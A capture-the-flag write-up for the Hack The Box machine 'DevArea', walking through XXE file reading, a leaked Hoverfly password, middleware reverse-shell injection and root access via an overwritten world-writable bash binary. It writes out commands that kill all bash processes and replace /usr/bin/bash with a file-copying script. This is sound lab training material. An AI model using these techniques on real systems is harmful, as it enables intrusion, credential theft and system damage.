HTB DevArea — Detailed Solution Notes

Platform: Hack The Box | Machine: DevArea | OS: Linux (Ubuntu) | Difficulty: Medium | Vulnerability Types: SSRF, XXE, JWT Bypass, & Binary Hijacking

🗺️ Attack Chain Summary

1. Reconnaissance: Nmap scan reveals ports 22, 80, 8080 (Employee Service), and 8888 (Hoverfly API).
2. Initial Foothold (XXE/SSRF): Exploiting an XML parser on port 8080 to read the Hoverfly service configuration file, leaking hardcoded admin credentials.
3. Lateral Movement (RCE): Using leaked credentials to authenticate to the Hoverfly API, injecting a Python reverse shell as "Middleware," and obtaining a shell as dev_ryan.
4. Privilege Escalation (Root): Exploiting a world-writable /usr/bin/bash binary. By switching to a dash shell and killing active bash processes, the binary was replaced with a malicious script and triggered via a sudo misconfiguration.

🧠 How Does a Hacker Think? — The Microservice Landscape

When you encounter a machine with several web-related ports (80, 8080, 8888), you are looking at a microservice architecture. The core vulnerability in these environments is often Trust. Services trust each other's data formats (XML/JSON) and often share credentials in configuration files. If you can exploit the "data processor" (port 8080), you can usually see the internal configuration of the entire cluster.

1️⃣ Reconnaissance

Network Scanning

The initial Nmap scan shows a narrow but interesting attack surface:

• Port 22 (SSH): Standard entry point, likely for later use with a found key or password.
• Port 80 (HTTP): A standard landing page.
• Port 8080 (HTTP): Identified as "Employee Service." It processes XML data.
• Port 8888 (HTTP): Identified as "Hoverfly." An API used for service virtualization and proxying.

Environment Setup

The web server utilizes virtual hosting. To access the services correctly, the target IP must be mapped to the domain in the local hosts file: echo "10.129.239.201 devarea.htb" | sudo tee -a /etc/hosts

2️⃣ Initial Foothold: The SSRF/XXE Maneuver

Vulnerability Analysis

The service on port 8080 accepts XML input. By testing for XML External Entity (XXE), we discovered that the parser allows the inclusion of system files.

The Maneuver: Reading Service Configurations

While /etc/passwd is the standard test, a more advanced hacker looks for Systemd service files. These files define how a service starts and often contain hardcoded passwords or API keys.

• Target File: /etc/systemd/system/hoverfly.service
• The Leak: Reading this file revealed the Hoverfly execution command: ExecStart=/opt/HoverFly/hoverfly -username admin -password O7IJ27MyyXiU

3️⃣ User Access: The Middleware RCE Maneuver

JWT Authentication

With the credentials admin:O7IJ27MyyXiU, we authenticated to the Hoverfly API on port 8888 to receive a JWT token. This token grants administrative access to Hoverfly’s features.

The Maneuver: Middleware Injection

Hoverfly allows developers to use "Middleware"—scripts that process every request passing through the proxy.

• The Exploit: We used a PUT request to inject a Python-based reverse shell as the middleware.
• The Trigger: Any standard HTTP request to the server forces Hoverfly to "process" the traffic, executing our Python code in the background.
• Result: A reverse shell connection was established, providing access as the dev_ryan user.

4️⃣ Privilege Escalation: The Binary Hijacking Maneuver

Identifying the Weakness

A manual audit of the system revealed a massive security hole: the permissions for /usr/bin/bash were set to 777 (-rwxrwxrwx). This means any user can delete or overwrite the primary system shell.

The "Kill & Dash" Strategy (Overcoming the Lock)

Attempting to overwrite /usr/bin/bash while logged in via bash results in a Text file busy error. To bypass this:

1. Switch Shells: We spawned a new reverse shell using /bin/dash instead of bash. Since we were no longer "using" the bash binary, the file lock was eligible to be broken.
2. Terminate Processes: kill -9 $(pgrep -x bash) was used to stop every other bash instance on the system.
3. Overwrite: With the file unlocked, we replaced the 1.4MB binary with a tiny 35-byte shell script: echo '#!/bin/sh \n cat /root/root.txt > /tmp/root.txt' > /usr/bin/bash

The Shebang Hijack

The final step involved a sudo misconfiguration. User dev_ryan could run /opt/syswatch/syswatch.sh as root.

• The Logic: The syswatch.sh script begins with #!/bin/bash.
• Execution: When we ran the script with sudo, the system looked for /bin/bash to interpret it. Since we replaced /bin/bash with our own script, the system executed our "cat flag" command with full root authority.

🛠️ Core Maneuvers Breakdown

• XXE/SSRF (XML External Entity)
• JWT Authentication Bypass
• Middleware RCE (Remote Code Execution)
• The "Dash Switch" Strategy
• Shebang Hijacking

🔑 General Hacker Mindset Summary

• XML is a Gateway: If an entry point accepts XML, never ignore XXE. It is often the "eye" that lets you see inside the server’s internal configurations.
• Hunt for Service Files: /etc/systemd/system is a goldmine for credentials. Developers often forget these files exist once the service is running.
• Kill the Busy Processes: If a binary says it's "busy," don't give up. Identify the processes using it, switch to an alternative shell, and clear the path for the overwrite.
• 777 on Bash is Game Over: If a critical system binary like /usr/bin/bash is world-writable, the machine is compromised. It's only a matter of time before someone hijacks the execution flow.